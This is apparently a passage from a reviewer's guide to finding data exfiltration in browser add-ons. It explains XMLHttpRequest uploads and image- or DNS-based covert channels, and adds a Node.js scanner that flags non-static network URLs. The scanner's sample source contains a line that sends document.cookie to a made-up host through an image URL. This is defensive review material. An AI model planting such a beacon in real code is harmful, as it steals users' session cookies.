= Guide =
== External communication ==
An add-on that is completely self-contained and makes no outside connections can hardly exfiltrate data. Once it does talk to the network, the most common channel is plain HTTP GET and POST requests. Look for instances of ''XMLHttpRequest'', like:
<syntaxhighlight lang="javascript">
var xhr = new XMLHttpRequest();
// the request target: here a string constant, so the destination is known
xhr.open('POST', 'https://api.imgur.com/3/image');
var fd = new FormData();
// the request body: what ends up in 'file' is what leaves the browser
fd.append("image", file);
[...]
xhr.send(fd);
</syntaxhighlight>
The corresponding ''.open()'' call nearby takes the URI for the request, in this case a string constant, so the destination can be read off directly. The call to ''.send()'' finally posts the request with the form data, which is filled from the ''file'' variable; follow that variable backwards to find out what is actually being uploaded.
=== Covert channels ===
A sneakier channel to an external server is to embed an image file (or any other remote resource) from a URL that encodes data in the file name, in a GET parameter, or even in the host name. No ''XMLHttpRequest'' is needed: a plain ''.src'' assignment, an ''&lt;img&gt;'' tag or a CSS background makes the browser fetch the URL, and the server receives the data as a side effect of serving the image. When the data sits in the host name, it is leaked through the DNS lookup even if the HTTP request never completes.
=== Take-aways ===
* Beware of non-static URIs that are constructed from variables; a string constant tells you the destination, an expression does not.
* Follow those variables back to where they are filled, both for the URI and for the request body.
* Is the resulting URI always something you'd expect from the add-on's description?
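The following is an added example written for this guide, not code from the page or from any add-on: a heuristic triage scanner, in Node.js, that lists the network sinks in an add-on's JavaScript and reports for each whether the URL is a string constant or an expression built from variables. It covers the ''XMLHttpRequest'' case above and generalises it to ''fetch'', ''navigator.sendBeacon'' and ''WebSocket'', and it flags ''.src'' assignments as candidates for the image covert channel. The sample add-on source inside it is constructed for the example (the hosts are made up, except the imgur URL taken from the snippet above); the sink list, the function names and the regexes are the example's own assumptions, not an AMO tool.

```javascript
// Added example, not from the wiki page: a heuristic scanner for the network
// sinks in an add-on's JavaScript. It lists every call that sends data out
// (XMLHttpRequest.open, fetch, sendBeacon, WebSocket) and every element .src
// assignment (the image covert channel), then reports whether the URL is a
// string constant or an expression built from variables. Regex plus a small
// balanced-paren expression reader, so it is a triage aid, not a parser.

const SINKS = [
  // Each pattern matches up to the start of the URL argument/expression.
  { name: 'XMLHttpRequest.open',  re: /\.open\(\s*(['"])[A-Za-z]+\1\s*,\s*/g, stops: [','] },
  { name: 'fetch',                re: /\bfetch\(\s*/g,                        stops: [','] },
  { name: 'navigator.sendBeacon', re: /\bsendBeacon\(\s*/g,                   stops: [','] },
  { name: 'WebSocket',            re: /\bnew\s+WebSocket\(\s*/g,              stops: [','] },
  { name: 'element.src',          re: /\.src\s*=\s*/g,                        stops: [';', '\n'] },
];

// Read one JS expression starting at `pos`: stop at an unmatched closer or at
// a top-level character from `stops`, skipping over quoted strings.
function readExpression(src, pos, stops) {
  let depth = 0, quote = null, i = pos;
  for (; i < src.length; i++) {
    const c = src[i];
    if (quote) {
      if (c === '\\') i++;               // skip an escaped character in a string
      else if (c === quote) quote = null;
      continue;
    }
    if (c === '"' || c === "'" || c === '`') { quote = c; continue; }
    if ('([{'.includes(c)) { depth++; continue; }
    if (')]}'.includes(c)) { if (depth === 0) break; depth--; continue; }
    if (depth === 0 && stops.includes(c)) break;
  }
  return src.slice(pos, i).trim();
}

// A URL expression is "static" only if it is a single string literal with no
// concatenation and no ${} interpolation.
function isStaticUrl(expr) {
  return /^(['"])(?:\\.|(?!\1).)*\1$/.test(expr) || /^`(?:\\.|[^`$])*`$/.test(expr);
}

// Host name of a static literal, or null if it is not an absolute URL.
function hostOf(literal) {
  try { return new URL(literal.slice(1, -1)).hostname; } catch (e) { return null; }
}

function scanSource(src, file = '<inline>') {
  const findings = [];
  for (const sink of SINKS) {
    sink.re.lastIndex = 0;
    let m;
    while ((m = sink.re.exec(src)) !== null) {
      const expr = readExpression(src, m.index + m[0].length, sink.stops);
      const isStatic = isStaticUrl(expr);
      findings.push({
        file,
        line: src.slice(0, m.index).split('\n').length,
        sink: sink.name,
        expr,
        static: isStatic,
        host: isStatic ? hostOf(expr) : null,
      });
    }
  }
  return findings.sort((a, b) => a.line - b.line);
}

// Constructed sample add-on source (not a real add-on): the imgur upload from
// the guide plus three other sinks a reviewer would want flagged.
const SAMPLE_ADDON = [
  "var xhr = new XMLHttpRequest();",
  "xhr.open('POST', 'https://api.imgur.com/3/image');",
  "var fd = new FormData();",
  'fd.append("image", file);',
  "xhr.send(fd);",
  "function report(endpoint, payload) {",
  "  fetch(endpoint + '/collect?u=' + encodeURIComponent(payload), { method: 'GET' });",
  "}",
  "var beacon = new Image();",
  "beacon.src = 'https://' + btoa(document.cookie).replace(/=/g, '') + '.example.invalid/p.gif';",
  "navigator.sendBeacon(`https://telemetry.example.invalid/v1`, JSON.stringify({ ok: true }));",
].join('\n');

function formatFinding(f) {
  const tag = f.static ? `static, host=${f.host}` : 'NON-STATIC, follow the variables';
  return `${f.file}:${f.line} ${f.sink} -> ${f.expr}  [${tag}]`;
}

for (const f of scanSource(SAMPLE_ADDON, 'content.js')) console.log(formatFinding(f));
```

On the constructed sample the scanner reports four sinks: the imgur upload and the ''sendBeacon'' call resolve to static hosts a reviewer can compare against the add-on's description, while the ''fetch'' target and the ''Image'' source are non-static and point at the variables to follow (''endpoint'' and the cookie-derived host name). The ''.src'' pattern also catches ''script.src'' assignments, which is intended: remote script loading is a network sink too. Minified or obfuscated code defeats the regexes, which is why the next section matters.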
== Obfuscation ==